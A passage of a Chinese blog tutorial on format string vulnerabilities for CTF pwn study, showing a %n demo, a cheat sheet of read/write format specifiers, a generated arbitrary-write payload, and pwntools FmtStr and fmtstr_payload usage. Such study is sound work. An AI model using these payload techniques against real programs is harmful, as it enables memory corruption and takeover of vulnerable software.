<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//gcc str.c -m32 -o str</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> c = <span class="number">0</span>; </span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%.100d%n"</span>, c,&amp;c);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"\nthe value of c: %d\n"</span>, c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们可以看到c被修改成了100</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</span><br><span class="line">the value of c: 100</span><br></pre></td></tr></table></figure>
<p>那如果我们想要把指修改成0x12345678呢？难道我们要让他回显0x12345678字节长的字符串回来？并不是，这里提供一份表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">这部分来自icemakr的博客</span><br><span class="line"></span><br><span class="line">32位</span><br><span class="line"></span><br><span class="line">读</span><br><span class="line"></span><br><span class="line">&apos;%&#123;&#125;$x&apos;.format(index)           // 读4个字节</span><br><span class="line">&apos;%&#123;&#125;$p&apos;.format(index)           // 同上面</span><br><span class="line">&apos;$&#123;&#125;$s&apos;.format(index)</span><br><span class="line">写</span><br><span class="line"></span><br><span class="line">&apos;%&#123;&#125;$n&apos;.format(index)           // 解引用，写入四个字节</span><br><span class="line">&apos;%&#123;&#125;$hn&apos;.format(index)          // 解引用，写入两个字节</span><br><span class="line">&apos;%&#123;&#125;$hhn&apos;.format(index)         // 解引用，写入一个字节</span><br><span class="line">&apos;%&#123;&#125;$lln&apos;.format(index)         // 解引用，写入八个字节</span><br><span class="line"></span><br><span class="line">////////////////////////////</span><br><span class="line">64位</span><br><span class="line"></span><br><span class="line">读</span><br><span class="line"></span><br><span class="line">&apos;%&#123;&#125;$x&apos;.format(index, num)      // 读4个字节</span><br><span class="line">&apos;%&#123;&#125;$lx&apos;.format(index, num)     // 读8个字节</span><br><span class="line">&apos;%&#123;&#125;$p&apos;.format(index)           // 读8个字节</span><br><span class="line">&apos;$&#123;&#125;$s&apos;.format(index)</span><br><span class="line">写</span><br><span class="line"></span><br><span class="line">&apos;%&#123;&#125;$n&apos;.format(index)           // 解引用，写入四个字节</span><br><span class="line">&apos;%&#123;&#125;$hn&apos;.format(index)          // 解引用，写入两个字节</span><br><span class="line">&apos;%&#123;&#125;$hhn&apos;.format(index)         // 解引用，写入一个字节</span><br><span class="line">&apos;%&#123;&#125;$lln&apos;.format(index)         // 解引用，写入八个字节</span><br><span class="line"></span><br><span class="line">%1$lx: RSI</span><br><span class="line">%2$lx: RDX</span><br><span class="line">%3$lx: RCX</span><br><span class="line">%4$lx: R8</span><br><span class="line">%5$lx: R9</span><br><span class="line">%6$lx: 栈上的第一个QWORD</span><br></pre></td></tr></table></figure>
<p>我们可以通过%{}$hhn来一字节一字节的写入。举个例子，我们希望向0x08048000写入值0x10203040，在pwntools里，我们可以用命令fmtstr_payload。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; fmtstr_payload(6, &#123;0x08048000:0x10203040&#125;)</span><br><span class="line">&apos;\x00\x80\x04\x08\x01\x80\x04\x08\x02\x80\x04\x08\x03\x80\x04\x08%48c%6$hhn%240c%7$hhn%240c%8$hhn%240c%9$hhn&apos;</span><br></pre></td></tr></table></figure>
<p>即开头为四个地址的小段表示加一堆格式化字符<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">\x00\x80\x04\x08</span><br><span class="line">\x01\x80\x04\x08</span><br><span class="line">\x02\x80\x04\x08</span><br><span class="line">\x03\x80\x04\x08</span><br><span class="line">%48c%6$hhn</span><br><span class="line">%240c%7$hhn</span><br><span class="line">%240c%8$hhn</span><br><span class="line">%240c%9$hhn</span><br></pre></td></tr></table></figure></p>
<p>即对0x08048000写入16+48 = 64 = 0x40<br>对0x08048000写入0x40+240 = 304 = (uint8)0x130 = 0x30<br>…</p>
<p>但这个payload以0x00开头，应该是传不过去的，还是要人工写。</p>
<hr>
<h2 id="pwntools相关模块的使用"><a href="#pwntools相关模块的使用" class="headerlink" title="pwntools相关模块的使用"></a>pwntools相关模块的使用</h2><p>对于格式化字符串漏洞，pwntools有模块fmtstr</p>
<p>docs地址：<a href="http://pwntools.readthedocs.io/en/stable/fmtstr.html" target="_blank" rel="noopener">http://pwntools.readthedocs.io/en/stable/fmtstr.html</a></p>
<p>对于这个模块，我只能说建议手写，至少你要懂原理才去用这个模块，不然就是脚本小子。</p>
<p>例如之前测试某个程序格式化字符串的偏移位置时，我们是采用手动测试，直到输出字符串前4字节的16进制值为止。pwntools则有函数<strong>FmtStr</strong>。</p>
<p>首先你要自己写一个函数，能够不断输入格式化字符串来测试。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#pwntools的示例</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="function"><span class="keyword">def</span> <span class="title">exec_fmt</span><span class="params">(payload)</span>:</span></span><br><span class="line"><span class="meta">... </span>    p = process(program)</span><br><span class="line"><span class="meta">... </span>    p.sendline(payload)</span><br><span class="line"><span class="meta">... </span>    <span class="keyword">return</span> p.recvall()</span><br><span class="line">...</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>autofmt = FmtStr(exec_fmt)</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>offset = autofmt.offset</span><br><span class="line"><span class="comment">#此处的offset就是我们需要找的偏移值</span></span><br></pre></td></tr></table></figure>
<p>生成任意地址写的payload的函数：<strong>fmtstr_payload</strong></p>
<p>示例代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># we want to do 3 writes</span></span><br><span class="line">writes = &#123;<span class="number">0x08041337</span>:   <span class="number">0xbfffffff</span>,</span><br><span class="line">          <span class="number">0x08041337</span>+<span class="number">4</span>: <span class="number">0x1337babe</span>,</span><br><span class="line">          <span class="number">0x08041337</span>+<span class="number">8</span>: <span class="number">0xdeadbeef</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># the printf() call already writes some bytes</span></span><br><span class="line"><span class="comment"># for example :</span></span><br><span class="line"><span class="comment"># strcat(dest, "blabla :", 256);</span></span><br><span class="line"><span class="comment"># strcat(dest, your_input, 256);</span></span><br><span class="line"><span class="comment"># printf(dest);</span></span><br><span class="line"><span class="comment"># Here, numbwritten parameter must be 8</span></span><br><span class="line">payload = fmtstr_payload(<span class="number">5</span>, writes, numbwritten=<span class="number">8</span>)</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>这篇文章主要是我做了一些格式化字符串的题目以后有感而发写的，有些地方可能还写的不是很到位，望指正，</p>
<hr>
<p>以下为参考资料：</p>
<p><a href="http://0x48.pw/2017/03/13/0x2c/" target="_blank" rel="noopener">http://0x48.pw/2017/03/13/0x2c/</a><br><a href="http://blog.csdn.net/prettyday/article/details/50366608" target="_blank" rel="noopener">http://blog.csdn.net/prettyday/article/details/50366608</a><br><a href="http://www.cnblogs.com/Ox9A82/p/5429099.html" target="_blank" rel="noopener">http://www.cnblogs.com/Ox9A82/p/5429099.html</a><br><a href="http://www.secbox.cn/hacker/7482.html" target="_blank" rel="noopener">http://www.secbox.cn/hacker/7482.html</a><br><a href="http://pwntools.readthedocs.io/en/stable/fmtstr.html" target="_blank" rel="noopener">http://pwntools.readthedocs.io/en/stable/fmtstr.html</a></p>

      
    </div>

    

    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Veritas501</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://veritas501.github.io/2017/04/28/格式化字符串漏洞学习/" title="格式化字符串漏洞学习">https://veritas501.github.io/2017/04/28/格式化字符串漏洞学习/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PWN/" rel="tag"># PWN</a>
          
            <a href="/tags/格式化字符串/" rel="tag"># 格式化字符串</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/28/论canary的几种玩法/" rel="next" title="论canary的几种玩法">
                <i class="fa fa-chevron-left"></i> 论canary的几种玩法
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/04/30/pwnable.kr_writeup/" rel="prev" title="pwnable.kr writeup">
                pwnable.kr writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/215.png"
                alt="Veritas501" />
            
              <p class="site-author-name" itemprop="name">Veritas501</p>
              <p class="site-description motion-element" itemprop="description">开始踏上Re&Pwn之路...</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">62</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">37</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/veritas501" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="http://music.163.com/#/user/home?id=58295006" target="_blank" title="网易云"><i class="fa fa-fw fa-music"></i>网易云</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.zhihu.com/people/xu-qt/activities" target="_blank" title="知乎"><i class="fa fa-fw fa-quora"></i>知乎</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://osu.ppy.sh/users/9533614" target="_blank" title="OSU"><i class="fa fa-fw fa-headphones"></i>OSU</a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是格式化字符串"><span class="nav-number">1.</span> <span class="nav-text">什么是格式化字符串</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞原理"><span class="nav-number">2.</span> <span class="nav-text">漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实现任意地址读"><span class="nav-number">3.</span> <span class="nav-text">实现任意地址读</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实现任意地址写"><span class="nav-number">4.</span> <span class="nav-text">实现任意地址写</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwntools相关模块的使用"><span class="nav-number">5.</span> <span class="nav-text">pwntools相关模块的使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#写在最后"><span class="nav-number">6.</span> <span class="nav-text">写在最后</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Veritas501</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Gemini</a> v6.3.0</div>




        








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'zUGXRoho5JEFbk0lDKssrDi6-gzGzoHsz',
        appKey: 'IE9Knp7ku8I57kP5vFnPO2zA',
        placeholder: '说点什么...',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("97qzbH6lJuabRg1KDY7DtJRS-gzGzoHsz", "GS8vVhMCaeXncQF8mQOIShBj");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            
            counter.save(null, {
              success: function(counter) {
                
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.get('time'));
                
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            
              var newcounter = new Counter();
              /* Set ACL */
              var acl = new AV.ACL();
              acl.setPublicReadAccess(true);
              acl.setPublicWriteAccess(true);
              newcounter.setACL(acl);
              /* End Set ACL */
              newcounter.set("title", title);
              newcounter.set("url", url);
              newcounter.set("time", 1);
              newcounter.save(null, {
                success: function(newcounter) {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
                },
                error: function(newcounter, error) {
                  console.log('Failed to create');
                }
              });
            
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  
  

  


  
  

  

  

  

  

  

</body>
</html>
